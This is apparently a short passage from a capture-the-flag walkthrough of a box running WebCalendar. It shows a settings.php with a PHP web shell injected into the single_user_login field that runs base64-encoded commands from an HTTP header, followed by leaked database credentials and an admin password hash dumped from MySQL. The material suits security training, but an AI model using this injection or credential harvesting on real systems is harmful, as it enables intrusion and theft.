5 box enum www-data
# /webcalendar/includes/settings.php
webcalendar-shell# cat settings.php
<?php
/* updated via install/index.php on Sat, 04 Sep 2021 17:03:47 -0400
install_password: 2b793cda199e6d21d3de4c9906254ee8
db_type: mysql
db_host: localhost
db_database: intranet
db_login: wc
db_password: edjfbxMT7KKo2PPC
db_persistent: false
db_cachedir: /tmp
user_inc: user.php
use_http_auth: false
single_user: false
single_user_login: */print(____);passthru(base64_decode($_SERVER[HTTP_CMD]));die;
# end settings.php */
?>
# exploring mysql
www-data@ucal:/tmp$ mysql -u root -p
Enter password:
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| intranet |
+--------------------+
2 rows in set (0.00 sec)
mysql> select cal_login, cal_passwd from webcal_user;
+-----------+----------------------------------+
| cal_login | cal_passwd |
+-----------+----------------------------------+
| admin | cbb44d79209bee5af34457c3fafd4f1d |
+-----------+----------------------------------+SuidEnum
PEAS
Last updated